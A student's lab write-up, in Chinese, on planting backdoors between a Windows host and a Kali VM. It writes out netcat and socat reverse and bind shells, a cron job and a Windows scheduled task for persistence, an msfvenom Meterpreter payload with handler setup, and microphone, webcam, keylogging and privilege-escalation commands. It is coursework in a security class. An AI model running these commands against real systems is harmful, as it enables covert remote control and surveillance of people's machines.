实验内容 

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

通过点击广告连接,触发ie浏览器的自动下载漏洞

(2)例举你知道的后门如何启动起来(win及linux)的方式?

通过伪装成为常用软件,诱导安装使用

(3)Meterpreter有哪些给你映像深刻的功能?

具有高度集成性的功能,通过一个软件,可以远程监控目标主机的多个行为,同时在管理员运行后门之后,可以获得最高权限,进行更深的潜伏

(4)如何发现自己有系统有没有被安装后门?

目前只能用安全卫士或病毒查杀软件去检测

准备工作

1.关闭计算机中的病毒查杀软件和安全卫士

2.下载ncat和socat工具

3.获取windows和linux端的ip地址

Windows端使用ipconfig获取ip地址为:192.168.43.13

Linux端使用ifconfig获取ip地址为:192.168.252.128

 实验过程

一、使用netcat获取主机操作Shell,cron启动

(1)windows获得Linux Shell

1.打开Windows命令提示行

2.跳转至ncat工具所在目录之中,并输入指令ncat.exe -l -p 4304 ,通过ncat工具监测4304端口

此时系统防火墙会提示运行软件ncat

3.进入Linux终端输入 nc 172.30.4.147 4304 -e /bin/sh,反弹连接Windows

4.windows获得kali中linux的shell,验证后,反弹连接成功

(2)Linux获得windows Shell

1.在linux终端输入 nc -l -p 4304 开启监听

2.在windows中 使用ncat.exe -e cmd.exe 192.168.198.135 4304,反弹连接Linux

3.返回Linux查看并验证

(3)使用ncat工具传输数据

1.在windows下输入 ncat.exe -l 4304

2.在linux下输入nc 192.168.43.13 4304

3.输入文字进行验证

验证成功

(4)使用ncat获取主机cron启动

1.在windows下输入ncat.exe -l -p 4304

2.在linux下输入 crontab -e 添加定时启动任务

3.进入vim编辑器中,在最后一行添加定时任务指令,51 * * * * /bin/netcat 172.30.4.147 4313 -e /bin/sh

该指令的功能是每小时第51分钟执行后面的指令,修改完毕记得保存

由于此时时间为9:49分在两分钟后便获取主机cron启动

4.验证,在51分钟之前,输入内容不显示,在51分之后突然唤醒,并能够获取权限

二、使用socat获取主机操作Shell, 任务计划启动

(1)设置系统任务计划

1.在Windows中搜索系统设置中,计划任务功能

2.创建任务,并命名为4304

3.设置触发器为工作站锁定时

4.新建操作,为打开socat.exe

5.添加参数tcp-listen:4304 exec:cmd.exe,pty,stderr

6.创建完成后,按“win+L”锁定计算机(恢复后也弹出了防火墙,但是没有截到)

7.查看计划任务

(2)通过Linux查看是否获得shell

1.输入指令 socat - tcp:192.168.43.13:4304

2.验证

验证成功

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在Linux输入以下指令生成后门文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.252.128 LPORT=4304 -f exe > 20164304_backdoor.exe

此处LHOST为Linux端的ip地址,连接端口号为4304

生成文件成功

2.在Windows下输入ncat.exe -l 4304 > 20164304_backdoor.exe,准备接收后门文件

3.在Linux下输入 nc 192.168.43.13 4304 < 20164304_backdoor.exe

4.查看目录下文件

5.后门文件就位之后,在Linux中启动msf控制台

6.输入use exploit/multi/handler 进入监听模式

输入set payload windows/meterpreter/reverse_tcp 设置载荷,基于TCP的反向连接反弹windows shell

输入 set LHOST 192.168.43.13 设置本主机IP

输入 set LPORT 4304 设置本主机端口

通过show option 查看修改情况

7.此时输入exploit,等待启动后门程序

用管理员模式启动后门程序

输入指令,验证成功

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.截获音频

输入record_mic将自动截取一段音频并保存

2.输入webcam_snap调用摄像头拍照,拍照时摄像头会很明显的闪白光

3.使用keyscan_start记录键盘输入

错误操作

当输入keyscan_start后,不使用keyscan_dump停止,会出现异常

4.输入getsystem提权

错误案例其二

如果之前启动后门程序未使用管理员模式

提权成功

实验心得

通过本次实验,使用多种不同的思路尝试了对不同的系统终端机进行了提权,传输文件等后门程序操作,令我受益匪浅。其中后门程序对系统功能的调用完全颠覆了我之前对电脑操作的认识,以前只是认为程序软件功能都是自己下载安装,不去点击启动就不会应用,通过本次实验我看到了,使用后门程序,可以远程进行控制,获取用户隐私信息,相当的可怕。但是我发现后门攻击在原理上弄明白,还需要有社会工程学的加持,比如比较至关重要的是本机ip地址,如果不知道就无法进行攻击,此外,后门程序,如果养成良好的上网习惯,经常清理查杀检查,不去乱上奇奇怪怪的网站,点击奇奇怪怪的广告,电脑的安全还是可以得到保障的。这一认识也是源自于学习了攻击的原理才能领悟的,既增强了自我专业技术能力,有提高了信息安全意识。

Exp2 后门原理与实践 - 20164304 姜奥的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  2. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  6. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  7. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

随机推荐

  1. python rabbitMQ 发送端和接收端广播模式。

    消费者模型: import pika,time consumer = pika.BlockingConnection\ (pika.ConnectionParameters('localhost')) ...

  2. mininet的学习之三----------mininet中流表应用实战

    我们看的同一个视频,工整的整理见以下网址 https://blog.csdn.net/weixin_36372879/article/details/86371583#commentBox

  3. 爬虫模块介绍--selenium (浏览器自动化测试工具,模拟可以调用浏览器模拟人操作浏览器)

    selenium主要的用途就是控制浏览器,模仿真人操作浏览器的行为 模块安装:pip3 install selenium 需要控制的浏览器 from selenium import webdriver ...

  4. Mysql对用户的操作

    1.创建用户语法:CREATE USER 用户名@地址 IDENTIFIED BY '密码'; 2.给用户授权语法:GRANT 权限1, … , 权限n ON 数据库.* TO 用户名 3.撤销授权语 ...

  5. IPv6实验1_IPv6地址配置

    IPv6地址配置 实验任务 (1)掌握如何在路由器及PC上配置IPv6地址 (2)掌握如何用IPv6 ping命令进行IPv6地址可达性检查 (3)掌握如何用命令来查看IPv6地址配置 实验过程 在R ...

  6. lua 的 break

    break   ,退出最近的一层循环 return   , 一般用于函数,会直接退出所有的循环,或者判断,返回参数 ,,,} for key,value in pairs(tb) do while(t ...

  7. zabbix 监控进程

    参考资料 官方文档. 有时候某个进程挂了没有发现,直到业务中断才想起去检查.希望能有个功能在某个进程挂了以后发出告警. zabbix提供proc.num这个key对后台进程进行监控.原理很简单,其实就 ...

  8. python MySQL执行SQL查询结果返回字典

    写自动化测试的时候我希望执行数据库前置任务,把数据库查询的结果作为请求的参数,但是正常返回结果为列表嵌套里面,这样就会影响到关键字准确的获取,特别的受限于SQL的查询字段的的顺序,所以希望返回的单条数 ...

  9. shell脚本,如果文件中的第一列有相同的,就把相同的那些行的其他字段相加

    命令:awk '{a[$1]+=$2}{b[$1]+=$3}END{for(i in a){print i,a[i],b[i]}}'

  10. 《重构-改善既有代码的设计》学习笔记---Replace Temp with Query(以查询取代临时变量)

    临时变量的问题在于: 它们是暂时的,而且只能在所属函数内使用.由于临时变量只在所属函数内可见,所以,如果很多地方都在用这个临时变量,就会驱使你写出更长的函数.如果把临时变量替换为一个查询,那么其他函数 ...